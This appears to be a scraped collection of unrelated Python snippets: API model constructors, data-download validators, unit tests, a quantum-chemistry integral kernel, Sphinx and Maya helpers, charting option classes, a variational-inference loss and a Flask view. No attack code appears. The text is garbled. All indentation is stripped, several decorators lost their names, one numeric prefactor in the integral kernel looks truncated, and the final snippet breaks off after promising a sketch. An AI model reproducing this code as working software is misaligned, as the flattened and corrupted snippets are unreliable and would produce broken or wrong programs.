attribute_map = {'url': 'url', 'token': 'token', 'use_tls': 'use_tls'}
read_only_vars = {}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
for (var_name, var_value) in kwargs.items():
if ((var_name not in self.attribute_map) and (self._configuration is not None) and self._configuration.discard_unknown_keys and (self.additional_properties_type is None)):
continue
setattr(self, var_name, var_value)
return self
required_properties = set(['_data_store', '_check_type', '_spec_property_naming', '_path_to_item', '_configuration', '_visited_composed_classes'])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
for (var_name, var_value) in kwargs.items():
if ((var_name not in self.attribute_map) and (self._configuration is not None) and self._configuration.discard_unknown_keys and (self.additional_properties_type is None)):
continue
setattr(self, var_name, var_value)
if (var_name in self.read_only_vars):
raise ApiAttributeError(f'`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate class with read only attributes.') |
class AssistanceDownloadValidator(DownloadValidatorBase):
name = 'assistance'
def __init__(self, request_data: dict):
super().__init__(request_data)
self.tinyshield_models.extend([{'key': 'award_id', 'name': 'award_id', 'type': 'any', 'models': [{'type': 'integer'}, {'type': 'text', 'text_type': 'raw'}], 'optional': False, 'allow_nulls': False}, {'name': 'limit', 'key': 'limit', 'type': 'integer', 'min': 0, 'max': settings.MAX_DOWNLOAD_LIMIT, 'default': settings.MAX_DOWNLOAD_LIMIT}])
self._json_request = request_data
self._json_request = self.get_validated_request()
(award_id, _, fain, uri, generated_unique_award_id) = _validate_award_id(self._json_request.pop('award_id'))
filters = {'award_id': award_id, 'award_type_codes': tuple(set(assistance_type_mapping))}
award = fain
if ('AGG' in generated_unique_award_id):
award = uri
self._json_request.update({'account_level': 'treasury_account', 'download_types': ['assistance_transactions', 'sub_grants', 'assistance_federal_account_funding'], 'include_file_description': {'source': settings.ASSISTANCE_DOWNLOAD_README_FILE_PATH, 'destination': 'AssistanceAwardSummary_download_readme.txt'}, 'award_id': award_id, 'assistance_id': award, 'is_for_idv': False, 'is_for_contract': False, 'is_for_assistance': True, 'filters': filters, 'include_data_dictionary': True}) |
class NameCitationModelNestedBluePrint(SegmentedModelNestedBluePrint):
def __init__(self, *args, reference_segmenter_model: Model, citation_model: Model, **kwargs):
super().__init__(*args, **kwargs)
self.reference_segmenter_model = reference_segmenter_model
self.citation_model = citation_model
def iter_filter_layout_document(self, layout_document: LayoutDocument) -> Iterable[LayoutDocument]:
references_layout_document = self.filter_layout_document_by_segmentation_label(layout_document, '<references>')
labeled_layout_tokens = self.reference_segmenter_model.predict_labels_for_layout_document(references_layout_document, app_features_context=self.app_features_context)
LOGGER.debug('labeled_layout_tokens: %r', labeled_layout_tokens)
semantic_raw_references = list(SemanticMixedContentWrapper(list(self.reference_segmenter_model.iter_semantic_content_for_labeled_layout_tokens(labeled_layout_tokens))).iter_by_type(SemanticRawReference))
LOGGER.info('semantic_raw_references count: %d', len(semantic_raw_references))
raw_reference_documents = [LayoutDocument.for_blocks([semantic_raw_reference.view_by_type(SemanticRawReferenceText).merged_block]).remove_empty_blocks() for semantic_raw_reference in semantic_raw_references]
citation_labeled_layout_tokens_list = self.citation_model.predict_labels_for_layout_documents(raw_reference_documents, app_features_context=self.app_features_context)
raw_authors = [raw_author for citation_labeled_layout_tokens in citation_labeled_layout_tokens_list for ref in self.citation_model.iter_semantic_content_for_labeled_layout_tokens(citation_labeled_layout_tokens) if isinstance(ref, SemanticReference) for raw_author in ref.iter_by_type(SemanticRawAuthors)]
return [LayoutDocument.for_blocks([raw_author.merged_block]).remove_empty_blocks() for raw_author in raw_authors] |
@pytest.mark.parametrize('calling_file, calling_module', [('tests/test_apps/app_without_config/my_app.py', None), (None, 'tests.test_apps.app_without_config.my_app')])
def test_app_without_config__with_append(hydra_restore_singletons: Any, hydra_task_runner: TTaskRunner, calling_file: str, calling_module: str) -> None:
with hydra_task_runner(calling_file=calling_file, calling_module=calling_module, config_path='', config_name=None, overrides=['+abc=123', '+a.b=1', '+a.a=2'], configure_logging=True) as task:
assert ((task.job_ret is not None) and (task.job_ret.cfg == dict(abc=123, a=dict(b=1, a=2))))
verify_dir_outputs(task.job_ret, task.overrides) |
def int3c2e3d_sph_101(ax, da, A, bx, db, B, cx, dc, C):
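# Appears to be a machine-generated kernel for a three-center integral over a (p|s|p) shell pattern, assembled from Boys functions; the x* locals are hoisted common subexpressions.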
result = numpy.zeros((3, 1, 3), dtype=float)
x0 = (ax + bx)
x1 = (x0 ** (- 1.0))
x2 = ((- x1) * ((ax * A[0]) + (bx * B[0])))
x3 = (x2 + C[0])
x4 = (cx + x0)
x5 = (x4 ** (- 1.0))
x6 = ((- x1) * ((ax * A[1]) + (bx * B[1])))
x7 = (x6 + C[1])
x8 = ((- x1) * ((ax * A[2]) + (bx * B[2])))
x9 = (x8 + C[2])
x10 = (((cx * x0) * x5) * (((x3 ** 2) + (x7 ** 2)) + (x9 ** 2)))
x11 = (x5 * boys(2, x10))
x12 = (cx ** (- 1.0))
x13 = boys(1, x10)
x14 = ((((- 2.0) * x11) * x3) + (((2.0 * x12) * x13) * (x2 + A[0])))
x15 = ((x1 * x12) * x13)
x16 = (((((17. * da) * db) * dc) * (x4 ** (- 1.5))) * numpy.exp(((((- ax) * bx) * x1) * ((((A[0] - B[0]) ** 2) + ((A[1] - B[1]) ** 2)) + ((A[2] - B[2]) ** 2)))))
x17 = (x14 * x16)
x18 = ((((- 2.0) * x11) * x7) + (((2.0 * x12) * x13) * (x6 + A[1])))
x19 = (x16 * x18)
x20 = ((((- 2.0) * x11) * x9) + (((2.0 * x12) * x13) * (x8 + A[2])))
x21 = (x16 * x20)
result[(0, 0, 0)] = numpy.sum((x16 * ((x14 * x3) + x15)))
result[(0, 0, 1)] = numpy.sum((x17 * x7))
result[(0, 0, 2)] = numpy.sum((x17 * x9))
result[(1, 0, 0)] = numpy.sum((x19 * x3))
result[(1, 0, 1)] = numpy.sum((x16 * (x15 + (x18 * x7))))
result[(1, 0, 2)] = numpy.sum((x19 * x9))
result[(2, 0, 0)] = numpy.sum((x21 * x3))
result[(2, 0, 1)] = numpy.sum((x21 * x7))
result[(2, 0, 2)] = numpy.sum((x16 * (x15 + (x20 * x9))))
return result |
class FiresiteHTMLTranslator(html.HTMLTranslator):
def __init__(self, builder, *args, **kwds):
html.HTMLTranslator.__init__(self, builder, *args, **kwds)
self.current_section = 'intro'
self.insert_header = False
def visit_desc(self, node):
if (node.parent.tagname == 'section'):
self.insert_header = True
if (node['desctype'] != self.current_section):
self.body.append(f"<h2>{_DESCTYPE_NAMES[node['desctype']]}</h2>")
self.current_section = node['desctype']
if (node['desctype'] in _RENDER_WITH_DEFAULT):
html.HTMLTranslator.visit_desc(self, node)
else:
self.body.append(self.starttag(node, 'table', CLASS=node['objtype']))
def depart_desc(self, node):
if (node['desctype'] in _RENDER_WITH_DEFAULT):
html.HTMLTranslator.depart_desc(self, node)
else:
self.body.append('</table>\n\n')
def visit_desc_signature(self, node):
if (node.parent['desctype'] in _RENDER_WITH_DEFAULT):
html.HTMLTranslator.visit_desc_signature(self, node)
else:
self.body.append('<tr>')
self.body.append(self.starttag(node, 'th'))
if self.insert_header:
self.body.append(f"""<h3 class="sphinx-hidden">{node['fullname']}</h3>""")
self.insert_header = False
def depart_desc_signature(self, node):
if (node.parent['desctype'] in _RENDER_WITH_DEFAULT):
html.HTMLTranslator.depart_desc_signature(self, node)
else:
self.body.append('</th></tr>')
def visit_desc_content(self, node):
if (node.parent['desctype'] in _RENDER_WITH_DEFAULT):
html.HTMLTranslator.visit_desc_content(self, node)
else:
self.body.append('<tr>')
self.body.append(self.starttag(node, 'td'))
def depart_desc_content(self, node):
if (node.parent['desctype'] in _RENDER_WITH_DEFAULT):
html.HTMLTranslator.depart_desc_content(self, node)
else:
self.body.append('</td></tr>')
def visit_title(self, node):
if (node.parent.tagname == 'section'):
self.body.append('<h1 class="page-title">')
else:
html.HTMLTranslator.visit_title(self, node)
def depart_title(self, node):
if (node.parent.tagname == 'section'):
self.body.append('</h1>')
else:
html.HTMLTranslator.depart_title(self, node)
def visit_note(self, node):
self.body.append(self.starttag(node, 'aside', CLASS='note'))
def depart_note(self, node):
self.body.append('</aside>\n\n')
def visit_warning(self, node):
self.body.append(self.starttag(node, 'aside', CLASS='caution'))
def depart_warning(self, node):
self.body.append('</aside>\n\n') |
def create_shader(shader_tree, name=None):
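# Recursively build a Maya shading network with pymel: dict-valued attributes become upstream nodes whose named output is connected with the '>>' operator, plain values are set directly.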
shader_type = shader_tree['type']
if ('class' in shader_tree):
class_ = shader_tree['class']
else:
class_ = 'asShader'
shader = pm.shadingNode(shader_type, **{class_: 1})
if name:
shader.rename(name)
attributes = shader_tree['attr']
for key in attributes:
value = attributes[key]
if isinstance(value, dict):
node = create_shader(value)
output_attr = value['output']
(node.attr(output_attr) >> shader.attr(key))
else:
shader.setAttr(key, value)
return shader |
class OptionSeriesVectorPointEvents(Options):
@property
def click(self):
return self._config_get(None)
@click.setter
def click(self, value: Any):
self._config(value, js_type=False)
@property
def drag(self):
return self._config_get(None)
@drag.setter
def drag(self, value: Any):
self._config(value, js_type=False)
@property
def dragStart(self):
return self._config_get(None)
@dragStart.setter
def dragStart(self, value: Any):
self._config(value, js_type=False)
@property
def drop(self):
return self._config_get(None)
@drop.setter
def drop(self, value: Any):
self._config(value, js_type=False)
@property
def mouseOut(self):
return self._config_get(None)
@mouseOut.setter
def mouseOut(self, value: Any):
self._config(value, js_type=False)
@property
def mouseOver(self):
return self._config_get(None)
@mouseOver.setter
def mouseOver(self, value: Any):
self._config(value, js_type=False)
@property
def remove(self):
return self._config_get(None)
@remove.setter
def remove(self, value: Any):
self._config(value, js_type=False)
@property
def select(self):
return self._config_get(None)
@select.setter
def select(self, value: Any):
self._config(value, js_type=False)
@property
def unselect(self):
return self._config_get(None)
@unselect.setter
def unselect(self, value: Any):
self._config(value, js_type=False)
@property
def update(self):
return self._config_get(None)
@update.setter
def update(self, value: Any):
self._config(value, js_type=False) |
class PCSFeature(Enum):
PCS_DUMMY = 'pcs_dummy_feature'
PRIVATE_LIFT_PCF2_RELEASE = 'private_lift_pcf2_release'
PC_COORDINATED_RETRY = 'private_computation_coordinated_retry'
PRIVATE_LIFT_UNIFIED_DATA_PROCESS = 'private_lift_unified_data_process'
PCS_PRIVATE_LIFT_DECOUPLED_UDP = 'pcs_private_lift_decoupled_udp'
PRIVATE_ATTRIBUTION_MR_PID = 'private_attribution_with_mr_pid'
SHARD_COMBINER_PCF2_RELEASE = 'shard_combiner_pcf2_release'
NUM_MPC_CONTAINER_MUTATION = 'num_mpc_container_mutation'
PID_SNMK_LARGER_CONTAINER_TYPE = 'pid_snmk_larger_container_type'
PCF_TLS = 'pcf_tls'
PA_TIMESTAMP_VALIDATION = 'pa_timestamp_validation'
PL_TIMESTAMP_VALIDATION = 'pl_timestamp_validation'
PRE_VALIDATION_FILE_STREAM = 'pre_validation_file_stream'
PID_FILTER_LOW_QUALITY_IDENTIFIER_THRESH166 = 'pid_filter_low_quality_identifier_thresh166'
PUBLISHER_PC_PRE_VALIDATION = 'publisher_pc_pre_validation'
PARTNER_PC_PRE_VALIDATION = 'partner_pc_pre_validation'
PRIVATE_ATTRIBUTION_REFORMATTED_OUTPUT = 'private_attribution_reformatted_output'
PRIVATE_COMPUTATION_TRANSLATOR = 'private_computation_translator'
UNKNOWN = 'unknown'
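# _missing_ is the Enum fallback hook: match unknown values case-insensitively against member names and values, defaulting to UNKNOWN.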
@classmethod
def _missing_(cls, value: object) -> 'PCSFeature':
for member in cls:
if (str(value).casefold() in [member.value.casefold(), member.name.casefold()]):
return member
return PCSFeature.UNKNOWN
@staticmethod
def from_str(feature_str: str) -> 'PCSFeature':
if (len(feature_str) <= 1):
raise ValueError('Features of length <= 1 not supported. Check your config')
feature_str = feature_str.casefold()
try:
return PCSFeature(feature_str)
except ValueError:
logging.warning(f"can't map {feature_str} to pre-defined PCSFeature")
return PCSFeature.UNKNOWN |
def create_cosmwasm_execute_msg(sender_address: Address, contract_address: Address, args: Any, funds: Optional[str]=None) -> MsgExecuteContract:
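# Build a CosmWasm MsgExecuteContract with JSON-encoded call arguments, attaching parsed coins when funds are provided.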
msg = MsgExecuteContract(sender=str(sender_address), contract=str(contract_address), msg=json_encode(args).encode('UTF8'))
if (funds is not None):
msg.funds.extend(parse_coins(funds))
return msg |
def monte_carlo_approximate_reparam(observations: RVDict, num_samples: int, discrepancy_fn: DiscrepancyFn, params: Mapping[(RVIdentifier, torch.Tensor)], queries_to_guides: Mapping[(RVIdentifier, RVIdentifier)], subsample_factor: float=1.0, device: torch.device=_CPU_DEVICE) -> torch.Tensor:
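# Pathwise (reparameterized) Monte Carlo estimate: draw guide samples with rsample, form the log density ratio of model to guide (observation log-probs rescaled for subsampling), and average the discrepancy over num_samples draws.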
loss = torch.zeros(1).to(device)
for _ in range(num_samples):
variational_world = VariationalWorld.initialize_world(queries=queries_to_guides.values(), observations=observations, initialize_fn=(lambda d: d.rsample()), params=params, queries_to_guides=queries_to_guides)
world = World.initialize_world(queries=[], observations={**{query: variational_world[guide] for (query, guide) in queries_to_guides.items()}, **observations})
logu = ((world.log_prob(queries_to_guides.keys()) + ((1.0 / subsample_factor) * world.log_prob(observations.keys()))) - variational_world.log_prob(queries_to_guides.values()))
loss += discrepancy_fn(logu)
return (loss / num_samples) |
@pytest.mark.parametrize('ownership_range,num_components', [((6, 27), 3), ((6, 17), 4)])
def test_interlaced_vel_dof_order(ownership_range, num_components):
interlaced = LS.InterlacedDofOrderType()
num_equations = ((ownership_range[1] - ownership_range[0]) + 1)
(global_IS, vel_IS) = interlaced.create_vel_DOF_IS(ownership_range, num_equations, num_components)
for i in range(1, num_components):
global_vals = np.arange((ownership_range[0] + i), (ownership_range[1] + 1), num_components)
assert np.array_equal(global_IS[(i - 1)].array, global_vals)
for i in range(1, num_components):
scaled_ownership_range = ((ownership_range[0] * (num_components - 1)) // num_components)
local_vals = np.arange(start=((scaled_ownership_range + i) - 1), stop=(scaled_ownership_range + int(((num_equations * (num_components - 1)) // num_components))), step=(num_components - 1))
assert np.array_equal(vel_IS[(i - 1)].array, local_vals) |
def get_score(A, B):
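# Heuristic shape-similarity score for two colliding objects: center distance plus a volume-difference term plus the difference of largest side lengths; returns -1.0 when the bounding boxes do not collide.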
bbox_A = get_bbox(A)
bbox_B = get_bbox(B)
if (not is_colliding(bbox_A, bbox_B)):
return (- 1.0)
delta_pos = (bbox_B['center'] - bbox_A['center']).length
volume_A = ((bbox_A['size'].x * bbox_A['size'].y) * bbox_A['size'].z)
volume_B = ((bbox_B['size'].x * bbox_B['size'].y) * bbox_B['size'].z)
delta_vol = ((max(volume_A, volume_B) - min(volume_A, volume_B)) / 3.0)
side_A_max = max(bbox_A['size'].x, bbox_A['size'].y, bbox_A['size'].z)
side_B_max = max(bbox_B['size'].x, bbox_B['size'].y, bbox_B['size'].z)
delta_size_max = abs((side_A_max - side_B_max))
return ((delta_pos + delta_vol) + delta_size_max) |
def test_create_plan_start_model_downstream():
parsed = Namespace(select=['modelA+'])
graph = _create_test_graph()
execution_plan = ExecutionPlan.create_plan_from_graph(parsed, graph, MagicMock(project_name=PROJECT_NAME))
assert (execution_plan.before_scripts == [])
assert (execution_plan.dbt_models == ['model.test_project.modelA'])
assert_contains_only(execution_plan.after_scripts, ['script.model.AFTER.scriptA.py', 'script.model.AFTER.scriptB.py']) |
class OptionPlotoptionsAreasplineSonificationContexttracksMappingTremoloDepth(Options):
@property
def mapFunction(self):
return self._config_get(None)
@mapFunction.setter
def mapFunction(self, value: Any):
self._config(value, js_type=False)
@property
def mapTo(self):
return self._config_get(None)
@mapTo.setter
def mapTo(self, text: str):
self._config(text, js_type=False)
@property
def max(self):
return self._config_get(None)
@max.setter
def max(self, num: float):
self._config(num, js_type=False)
@property
def min(self):
return self._config_get(None)
@min.setter
def min(self, num: float):
self._config(num, js_type=False)
@property
def within(self):
return self._config_get(None)
@within.setter
def within(self, value: Any):
self._config(value, js_type=False) |
class OptionPlotoptionsDependencywheelSonificationContexttracksMappingNoteduration(Options):
@property
def mapFunction(self):
return self._config_get(None)
@mapFunction.setter
def mapFunction(self, value: Any):
self._config(value, js_type=False)
@property
def mapTo(self):
return self._config_get(None)
@mapTo.setter
def mapTo(self, text: str):
self._config(text, js_type=False)
@property
def max(self):
return self._config_get(None)
@max.setter
def max(self, num: float):
self._config(num, js_type=False)
@property
def min(self):
return self._config_get(None)
@min.setter
def min(self, num: float):
self._config(num, js_type=False)
@property
def within(self):
return self._config_get(None)
@within.setter
def within(self, value: Any):
self._config(value, js_type=False) |
def test_structure_json(complex_obj):
c = conversion[SerializeFormat.JSON]
uo = c.unstructure(complex_obj)
o = c.structure(uo, ComplexObj)
assert (o.float64_array.dtype == np.float64)
assert (o.float32_array.dtype == np.float32)
assert (o.int32_array.dtype == np.int32)
assert isinstance(o.an_enum, Categories) |
def extractShujinkouCom(item):
if ('Anime' in item['tags']):
return None
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('Isekai Kaeri no Ossan', 'Isekai Kaeri no Ossan wa, Fusei Sukiru de Fathercon Musume-tachi o Tororori ni', 'translated'), ("Let's be an Adventurer", "Let's be an Adventurer", 'translated'), ('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
def test_nonans_tesseroid_mask(dummy_layer):
((longitude, latitude), surface, reference, _) = dummy_layer
shape = (latitude.size, longitude.size)
layer = tesseroid_layer((longitude, latitude), surface, reference)
expected_mask = np.ones(shape, dtype=bool)
mask = layer.tesseroid_layer._get_nonans_mask()
npt.assert_allclose(mask, expected_mask)
layer = tesseroid_layer((longitude, latitude), surface, reference)
expected_mask = np.ones(shape, dtype=bool)
for index in ((2, 1), (3, 2)):
layer.top[index] = np.nan
expected_mask[index] = False
mask = layer.tesseroid_layer._get_nonans_mask()
npt.assert_allclose(mask, expected_mask)
layer = tesseroid_layer((longitude, latitude), surface, reference)
expected_mask = np.ones(shape, dtype=bool)
for index in ((2, 1), (3, 2)):
layer.bottom[index] = np.nan
expected_mask[index] = False
mask = layer.tesseroid_layer._get_nonans_mask()
npt.assert_allclose(mask, expected_mask)
layer = tesseroid_layer((longitude, latitude), surface, reference)
expected_mask = np.ones(shape, dtype=bool)
for index in ((1, 2), (2, 3)):
layer.top[index] = np.nan
expected_mask[index] = False
for index in ((1, 2), (2, 1), (3, 2)):
layer.bottom[index] = np.nan
expected_mask[index] = False
mask = layer.tesseroid_layer._get_nonans_mask()
npt.assert_allclose(mask, expected_mask) |
class TagSearch(object):
def __init__(self, view, bfr, window, center, pattern, match_type, mode, optional_tags, self_closing_tags, void_tags):
self.start = int(window[0])
self.end = int(window[1])
self.optional_tags = optional_tags
self.void_tags = void_tags
self.self_closing_tags = self_closing_tags
self.center = center
self.pattern = pattern
self.match_type = match_type
self.mode = mode
self.bfr = bfr
self.prev_match = None
self.return_prev = False
self.done = False
self.view = view
settings = sublime.load_settings('bh_tag.sublime-settings')
try:
self.scope_exclude = settings.get('tag_scope_exclude', {}).get(mode, ['string', 'comment'])
except Exception:
self.scope_exclude = ['string', 'comment']
def scope_check(self, pt):
illegal_scope = False
for exclude in self.scope_exclude:
illegal_scope |= bool(self.view.score_selector(pt, exclude))
return illegal_scope
def reset_end_state(self):
self.done = False
self.prev_match = None
self.return_prev = False
def remember(self):
self.return_prev = True
self.done = False
def get_tags(self):
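# Generator over tag matches in the search window; remember() makes the next call re-yield the previous match before scanning onward.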
if self.done:
return
if self.return_prev:
self.return_prev = False
(yield self.prev_match)
for m in self.pattern.finditer(self.bfr, self.start, self.end):
name = m.group(1).lower()
if (not self.match_type):
self_closing_slash = bool((m.group(2) != ''))
if ((not self_closing_slash) and (self.optional_tags is not None)):
optional = (self.optional_tags.match(name) is not None)
else:
optional = False
if (self_closing_slash and (self.self_closing_tags is not None)):
self_closing = (self.self_closing_tags.match(name) is not None)
else:
self_closing = False
if ((not optional) and (not self_closing) and (self.void_tags is not None)):
void = (self.void_tags.match(name) is not None)
else:
void = False
else:
if ((self.void_tags is not None) and (self.void_tags.match(name) is not None)):
continue
void = False
optional = False
self_closing = False
start = m.start(0)
end = m.end(0)
if (not self.scope_check(start)):
self.prev_match = TagEntry(start, end, name, optional, (void or self_closing))
self.start = end
(yield self.prev_match)
self.done = True |
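A hedged sketch of how a caller might drive the generator above: get_tags() yields matches lazily, and remember() re-queues the last match so the next get_tags() call starts by yielding it again (the TagEntry name attribute is an assumption based on the constructor call above):

def first_tag_named(search, wanted):
    # Scan forward for a tag; push it back so a later scan resumes on it.
    for entry in search.get_tags():
        if entry.name == wanted:
            search.remember()
            return entry
    return None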
class UnsubscribeTest(unittest.TestCase):
    # The patch decorators below lost their callable name in this snippet;
    # unittest.mock's mock.patch is assumed.
    @mock.patch('unsubscribe.app.unsubscribe_single_list', side_effect=mocked_unsubscribe_single_list)
    @mock.patch('unsubscribe.app.look_up_cognito_id', side_effect=mocked_look_up_cognito_id)
    @mock.patch('user_service.query_single_user', side_effect=mocked_query_single_user)
def test_unsubscribe(self, query_single_user_mock, look_up_cognito_id_mock, unsubscribe_single_list_mock):
event_body = {'cognito_id': '', 'email': '', 'character_set_preference': 'simplified', 'list': {'list_id': '123', 'list_name': 'HSK Level 1', 'character_set': 'simplified'}}
response = lambda_handler(self.apig_event(json.dumps(event_body)), '')
self.assertEqual(query_single_user_mock.call_count, 0)
self.assertEqual(look_up_cognito_id_mock.call_count, 1)
self.assertEqual(unsubscribe_single_list_mock.call_count, 1)
    @mock.patch('unsubscribe.app.unsubscribe_single_list', side_effect=mocked_unsubscribe_single_list)
    @mock.patch('unsubscribe.app.look_up_cognito_id', side_effect=mocked_look_up_cognito_id)
    @mock.patch('user_service.query_single_user', side_effect=mocked_query_single_user)
def test_unsubscribe_all(self, query_single_user_mock, look_up_cognito_id_mock, unsubscribe_single_list_mock):
event_body = {'cognito_id': '', 'email': '', 'character_set_preference': 'simplified', 'list': ''}
response = lambda_handler(self.apig_event(json.dumps(event_body)), '')
self.assertEqual(query_single_user_mock.call_count, 1)
self.assertEqual(look_up_cognito_id_mock.call_count, 1)
self.assertEqual(unsubscribe_single_list_mock.call_count, 2)
def apig_event(self, event_body):
        # Note: 'httpMethod' keys and 'https' protocol values were censored in
        # this snippet and are restored below; censored URL-valued fields
        # (origin, Referer, iss) are left empty rather than guessed.
        return {'resource': '/unsub', 'path': '/unsub', 'body': event_body, 'httpMethod': 'POST', 'headers': {'Accept': 'application/json, text/plain, */*', 'accept-encoding': 'gzip, deflate, br', 'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh-HK;q=0.7,zh-MO;q=0.6,zh;q=0.5', 'Authorization': 'eyJraWQiOiJq1231235fOwKv46JpjurGKzvma17eqCoaw', 'CloudFront-Forwarded-Proto': 'https', 'CloudFront-Is-Desktop-Viewer': 'true', 'CloudFront-Is-Mobile-Viewer': 'false', 'CloudFront-Is-SmartTV-Viewer': 'false', 'CloudFront-Is-Tablet-Viewer': 'false', 'CloudFront-Viewer-Country': 'IE', 'Host': 'api.haohaotiantian.com', 'origin': '', 'Referer': '', 'sec-ch-ua': '" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"', 'sec-ch-ua-mobile': '?0', 'sec-fetch-dest': 'empty', 'sec-fetch-mode': 'cors', 'sec-fetch-site': 'cross-site', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36', 'Via': '2.0 f8591238.cloudfront.net (CloudFront)', 'X-Amz-Cf-Id': 'rex4fmbUq5pvK123fj5bGvpw==', 'X-Amzn-Trace-Id': 'Root=1-60e123b7e7b70', 'X-Forwarded-For': '123', 'X-Forwarded-Port': '123', 'X-Forwarded-Proto': 'https'}, 'multiValueHeaders': {'Accept': ['application/json, text/plain, */*'], 'accept-encoding': ['gzip, deflate, br'], 'Accept-Language': ['en-US,en;q=0.9,zh-CN;q=0.8,zh-HK;q=0.7,zh-MO;q=0.6,zh;q=0.5'], 'Authorization': ['eyJraWQiOiJqVmhFdEN4Y123vZ25pdG123GKzvma17eqCoaw'], 'CloudFront-Forwarded-Proto': ['https'], 'CloudFront-Is-Desktop-Viewer': ['true'], 'CloudFront-Is-Mobile-Viewer': ['false'], 'CloudFront-Is-SmartTV-Viewer': ['false'], 'CloudFront-Is-Tablet-Viewer': ['false'], 'CloudFront-Viewer-Country': ['IE'], 'Host': ['api.haohaotiantian.com'], 'origin': [''], 'Referer': [''], 'sec-ch-ua': ['" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"'], 'sec-ch-ua-mobile': ['?0'], 'sec-fetch-dest': ['empty'], 'sec-fetch-mode': ['cors'], 'sec-fetch-site': ['cross-site'], 'User-Agent': ['Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'], 'Via': ['2.0 123.cloudfront.net (CloudFront)'], 'X-Amz-Cf-Id': ['rex4fmbU123BVnGAOV9sfj5bGvpw=='], 'X-Amzn-Trace-Id': ['Root=1-60e6d123b70'], 'X-Forwarded-For': ['123'], 'X-Forwarded-Port': ['443'], 'X-Forwarded-Proto': ['https']}, 'queryStringParameters': 'None', 'multiValueQueryStringParameters': 'None', 'pathParameters': 'None', 'stageVariables': 'None', 'requestContext': {'resourceId': '123', 'authorizer': {'claims': {'sub': '', 'aud': '123123', 'email_verified': 'true', 'event_id': 'cc6a7b68-e1bc-417b-9344-123', 'token_use': 'id', 'auth_time': '', 'iss': '', 'cognito:username': '', 'exp': 'Thu Jul 08 11:38:59 UTC 2021', 'iat': 'Thu Jul 08 10:38:59 UTC 2021', 'email': ''}}, 'resourcePath': '/user_data', 'httpMethod': 'GET', 'extendedRequestId': 'CJZWoF123FT_Q=', 'requestTime': '08/Jul/2021:10:38:59 +0000', 'path': '/user_data', 'accountId': '123', 'protocol': 'HTTP/1.1', 'stage': 'Prod', 'domainPrefix': 'api', 'requestTimeEpoch': 123, 'requestId': '11875c1237fec0aab', 'identity': {'cognitoIdentityPoolId': 'None', 'accountId': 'None', 'cognitoIdentityId': 'None', 'caller': 'None', 'sourceIp': '54', 'principalOrgId': 'None', 'accessKey': 'None', 'cognitoAuthenticationType': 'None', 'cognitoAuthenticationProvider': 'None', 'userArn': 'None', 'userAgent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36', 'user': 'None'}, 'domainName': 'api.haohaotiantian.com', 'apiId': '123'}, 'isBase64Encoded': False}
if (__name__ == '__main__'):
unittest.main() |
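One detail worth calling out in the tests above: stacked mock.patch decorators inject their mocks bottom-up, which is why query_single_user_mock (the bottom-most patch) arrives as the first argument. A minimal, self-contained illustration using stdlib targets:

from unittest import mock

@mock.patch('os.getcwd')           # top decorator -> last mock argument
@mock.patch('os.path.exists')      # bottom decorator -> first mock argument
def check_order(exists_mock, getcwd_mock):
    # The argument order mirrors the decorator stack read bottom-up.
    return exists_mock, getcwd_mock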
# The decorator below lost its callable name in this snippet; flask-apispec's
# @doc is assumed from the (tags=..., description=...) signature.
@doc(tags=['dates'], description=docs.CALENDAR_DATES)
class CalendarDatesView(ApiResource):
model = models.CalendarDate
schema = schemas.CalendarDateSchema
page_schema = schemas.CalendarDatePageSchema
cap = 500
filter_match_fields = [('event_id', models.CalendarDate.event_id)]
filter_multi_fields = [('calendar_category_id', models.CalendarDate.calendar_category_id)]
filter_fulltext_fields = [('description', models.CalendarDate.description_text), ('summary', models.CalendarDate.summary_text)]
filter_range_fields = [(('min_start_date', 'max_start_date'), models.CalendarDate.start_date), (('min_end_date', 'max_end_date'), models.CalendarDate.end_date)]
def args(self):
return utils.extend(args.paging, args.calendar_dates, args.make_sort_args(default='-start_date'))
def build_query(self, *args, **kwargs):
query = super().build_query(*args, **kwargs)
return query
def index_column(self):
return self.model.event_id |
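The filter_* class attributes above are declarative: the ApiResource base class is expected to turn them into SQLAlchemy filters. A hedged sketch (not the real base implementation) of how range declarations like filter_range_fields typically expand:

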